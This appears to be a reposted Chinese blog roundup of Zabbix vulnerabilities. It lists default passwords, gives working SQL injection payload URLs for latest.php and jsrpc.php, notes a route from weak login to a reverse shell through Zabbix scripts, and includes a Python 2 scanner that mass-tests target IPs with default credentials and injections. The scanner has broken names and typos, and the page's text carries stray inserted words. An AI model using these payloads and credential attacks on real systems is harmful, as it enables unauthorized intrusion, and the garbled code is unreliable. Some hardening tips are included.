Zabbix漏洞彙總
1、zabbix:php
zabbix是監控是一個基於WEB界面的提供分佈式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各類網絡參數,保證服務器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各類問題。html
2、Zabbix漏洞:python
一、弱口令:web
1 WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
二、SQL注入ajax
(1)sql
標題:latest.php處toogle_ids[]參數SQL注入shell
攻擊條件:登錄後安全
危害:可獲取系統權限服務器
URL以及payload:cookie
1 """ 2 http://a.b.c.d/latest.php?output=ajax&sid=登陸後的sessionid的後16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 3 """
(2)
標題:jsrpc.php處profileIdx2參數SQL注入
攻擊條件:無需登陸,亦能夠登陸後使用高權限的sid、cookie進行替換
危害:通常SQL注入危害
URL以及payload:
1 """ 2 http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 3 """
(3)
標題:其餘SQL注入漏洞:chart_bar.php處itemid參數和periods參數SQL注入;httpmon.php處applications參數SQL注入
攻擊條件:不詳
危害:不詳
URL以及payload:通常SQL注入payload嘗試
三、OS命令注入執行:
(1)弱口令登陸後,使用zabbix自帶的Script執行系統命令能夠反彈shell等等
(2)防護:
#不要設置AllowRoot=1,避免agent和server以root權限啓動。
#進制agent執行system.run,不要設置EnableRemoteCommands=1。
#即便打補丁。
四、本身寫的一個python檢查腳本:有問題及時噴我
1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 """ 4 This Python Script Is For "Zabbix" VulnScan! 5 Author:ChenRan 6 Company:360.net 7 """ 8 9 # import lib files 10 import os 11 import sys 12 import time 13 import logging 14 import datetime 15 import requests 16 import threading 17 from bs4 import BeautifulSoup 18 from optparse import OptionParser 19 20 #global varites define 21 ZabbixTarget = None#target ip address! 22 ZabbixFile = None#target ip address file 23 BlackList = [ 24 'incorrect', 25 '<!-- Login Form -->' 26 ] 27 28 #global config set 29 logging.basicConfig(level=logging.INFO,format='%(message)s') 30 31 #global function defines: 32 def Config_Init(): 33 """ 34 Take "http://" to the ip address to create targeturl! 35 """ 36 global ZabbixTarget 37 global ZabbixFile 38 if ZabbixTarget != None: 39 target = "http://%s"%ZabbixTarget 40 return [target] 41 elif ZabbixFile != None: 42 targetlist = [] 43 with open(ZabbixFile,"r") as fr: 44 for ip in fr.readlines(): 45 ip = ip.split("\n")[0].split("\r")[0] 46 target = "http://%s"%str(ip) 47 targetlist.append(target) 48 return targetlist 49 else: 50 return [] 51 52 def get_post_data(page_content): 53 """ 54 from response html get post data! 55 """ 56 postdata = {} 57 soup = BeautifulSoup(page_content, "html.parser") 58 for inputparameter in soup.find_all('input'): 59 if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs: 60 postdata[inputparameter['name']] = inputparameter['value'] 61 return postdata 62 63 def report_file_allinone(): 64 vulnlist = [] 65 scantime = str(datetime.datetime.now()) 66 for parents,dirs,filenames in os.walk("./"): 67 for filename in filenames: 68 if filename.find("zabbix_vulnscan_result") >= 0: 69 with open(filename,"r") as fr: 70 vulnlist.extend(fr.readlines()) 71 os.remove(filename) 72 with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw: 73 fw.write("vuln-IP,Vuln-Type,Scan-Time\n") 74 for line in vulnlist: 75 fw.write(line) 76 77 #Zabbix Scan Class Defines 78 class ZabbixScan: 79 def __init__(self,targetlist): 80 """ 81 #class column init! 82 VulnExpPHPFile: 83 //0-login-weakpassword 84 //1-httpmon.php parameter->applicationos 85 //2-chart_bar.php parameter->itemid 86 //3-jsrpc.php parameter->profileIdx2 87 //4-latest.php parameter->toggle_ids[] 88 //5-OS_Injection->When you login the system you can run you scripts! 89 TestTarget: 90 //0-login-weakpassword 91 //1-jsrpc.php 92 //2-latest.php 93 """ 94 self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary! 95 self._targetlist = targetlist #wait for scan target! 96 self._size = len(self._targetlist)#size of scan target! 97 self._sqlinjectionurl1_vulnlist = [] 98 self._sqlinjectionurl2_vulnlist = [] 99 self._login_weakpassword_vulnlist = [] 100 self._login_weakpassword_safelist = [] 101 102 def __del__(self): 103 del self._weakpassword 104 del self._targetlist 105 del self._size 106 del self._sqlinjectionurl1_vulnlist 107 del self._sqlinjectionurl2_vulnlist 108 del self._login_weakpassword_vulnlist 109 del self._login_weakpassword_safelist 110 111 def __len__(self): 112 """return size of targetlist""" 113 return self._size 114 115 def _scan_default_password_login(self): 116 for authinfo in self._weakpassword: 117 user = authinfo["username"] 118 pswd = authinfo["password"] 119 for target in self._targetlist: 120 logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo))) 121 headers = { 122 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 123 } 124 request = requests.session() 125 try: 126 response = request.get(target,headers=headers,timeout=3) 127 except Exception,ex: 128 self._login_weakpassword_safelist.append(target) 129 continue 130 if response.status_code != 200: 131 self._login_weakpassword_safelist.append(target) 132 continue 133 postdata = get_post_data(response.content) 134 headers["Referer"]=target 135 postdata["user"] = user 136 postdata["password"] = pswd 137 try: 138 response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3) 139 except Exception,ex: 140 self._login_weakpassword_safelist.append(target) 141 continue 142 if "chkbxRange.init();" in response.content: 143 for flagstring in BlackList: 144 if flagstring in response.content: 145 self._login_weakpassword_safelist.append(target) 146 self._login_weakpassword_vulnlist.append((target,user,pswd)) 147 else: 148 self._login_weakpassword_safelist.append(target) 149 request.close() 150 151 def _sqlinjectionurl1_scan(self): 152 logging.info("[*] latest.php sqlinjection scan!") 153 for vulntarget in self._login_weakpassword_vulnlist: 154 target = vulntarget[0] 155 user = vulntarget[1] 156 pswd = vulntarget[2] 157 request = requests.session() 158 headers = { 159 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 160 } 161 try: 162 response = request.get(target,headers=headers,timeout=3) 163 except Exception,ex: 164 continue 165 postdata = get_post_data(response.content) 166 postdata["user"] = user 167 postdata["password"] = pswd 168 headers["Referer"]=target 169 try: 170 response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3) 171 except Exception,ex: 172 continue 173 sessionid = response.cookie.values()[0][-16:] 174 scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid) 175 try: 176 response = request.get(scanurl,timeout=20) 177 except Exception,ex: 178 continue 179 if "SQL syntax" in repsonse: 180 self._sqlinjectionurl1_vulnlist.append(vulntarget) 181 else: 182 request.close() 183 184 def _sqlinjectionurl2_scan(self): 185 logging.info("[*] jsrpc.php sqlinjection scan!") 186 for vulntarget in self._targetlist: 187 scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" 188 headers = { 189 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 190 } 191 try: 192 response = request.get(url,headers=headers,timeout=20) 193 except Exception,ex: 194 continue 195 if "ed733b8d10be255eceba344d533586" in response.content: 196 self._sqlinjectionurl2_vulnlist.append(vulntarget) 197 else: 198 pass 199 200 def scan_run(self): 201 self._scan_default_password_login() 202 self._sqlinjectionurl1_scan() 203 self._sqlinjectionurl2_scan() 204 205 class scanthread(threading.Thread): 206 def __init__(self,threadname,targetlist): 207 threading.Thread.__init__(self,name=threadname) 208 self.scanner = ZabbixScan(targetlist) 209 self.name = threadname 210 self.targetlist = targetlist 211 def _create_csv(self): 212 scantime = str(datetime.datetime.now()) 213 with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw: 214 for vuln in self.scanner._login_weakpassword_vulnlist: 215 target = vuln[0].split("http://")[-1] 216 vulntype = "weakpassword" 217 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime) 218 fw.write(vulnstring) 219 for vuln in self.scanner._sqlinjectionurl1_vulnlist: 220 target = vuln[0].split("http://")[-1] 221 vulntype = "latest.php-SQLI" 222 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime) 223 fw.write(vulnstring) 224 for vuln in self.scanner._sqlinjectionurl1_vulnlist: 225 target = target.split("http://")[-1] 226 vulntype = "jsrpc.php-SQLI" 227 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime) 228 fw.write(vulnstring) 229 def run(self): 230 #logging.info("[*] %s running!"%self.name) 231 #logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist))) 232 self.scanner.scan_run() 233 self._create_csv() 234 #logging.info("[*] %s finished!"%self.name) 235 236 if __name__ == "__main__": 237 logging.info("[+]*****************************************************************[+]") 238 logging.info("Zabbix Scan Init!") 239 parser = OptionParser() 240 parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!") 241 parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!") 242 parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!") 243 (options, args) = parser.parse_args() 244 parameterchecklist = [options.iptarget,options.iptargetfile] 245 if parameterchecklist in [[None,None],[None,""],["",None],["",""]]: 246 logging.error("[-] Target parameters error!") 247 exit(0) 248 try: 249 options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum) 250 except Exception,ex: 251 logging.error("[-] Threadnum parameter error!") 252 exit(0) 253 [ZabbixTarget,ZabbixFile] = parameterchecklist 254 logging.info("[+] Scan Config Init!") 255 targetlist = Config_Init() 256 targetsize = len(targetlist) 257 logging.info("[+] Scan Target Number:%s"%str(targetsize)) 258 logging.info("[+] Scan Threads Init") 259 threadtargetsize = targetsize/options.threadnum 260 devidestart = 0 261 devideend = threadtargetsize 262 threadlist = [] 263 nameflag = 0 264 while True: 265 threadname = "scan-thread-%s"%str(nameflag) 266 nameflag += 1 267 if devideend < targetsize: 268 threadtargetlist = targetlist[devidestart:devideend] 269 threadlist.append(scanthread(threadname,threadtargetlist)) 270 devidestart += threadtargetsize 271 devideend += threadtargetsize 272 elif devidestart <= targetsize: 273 threadtargetlist = targetlist[devidestart:] 274 threadlist.append(scanthread(threadname,threadtargetlist)) 275 devidestart += threadtargetsize 276 devideend += threadtargetsize 277 else: 278 break 279 280 logging.info("[+] Scan Thread Start!") 281 for thread in threadlist: 282 thread.start() 283 time.sleep(2) 284 logging.info("[+] %s --Start!"%thread.name) 285 for thread in threadlist: 286 thread.join() 287 logging.info("[+] Scan Finished!") 288 logging.info("[+] Report Creating!") 289 report_file_allinone() 290 logging.info("[+] Report Create!") 291 exit(0) 292 293 294
相關文章
- 1. Zabbix漏洞總結
- 2. dedecms 漏洞彙總
- 3. 文件解析漏洞彙總
- 4. 常見漏洞類型彙總
- 5. 反序列化漏洞彙總
- 6. sonarQube掃描bug、漏洞處理彙總
- 7. 各種解析漏洞彙總
- 8. 常見Java庫漏洞彙總
- 9. WEB應用漏洞及修復彙總
- 10. 模板注入漏洞全彙總
- 更多相關文章...
- • Docker 資源彙總 - Docker教程
- • Web 詞彙表 - 網站建設指南
- • 算法總結-雙指針
- • 算法總結-回溯法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Zabbix漏洞總結
- 2. dedecms 漏洞彙總
- 3. 文件解析漏洞彙總
- 4. 常見漏洞類型彙總
- 5. 反序列化漏洞彙總
- 6. sonarQube掃描bug、漏洞處理彙總
- 7. 各種解析漏洞彙總
- 8. 常見Java庫漏洞彙總
- 9. WEB應用漏洞及修復彙總
- 10. 模板注入漏洞全彙總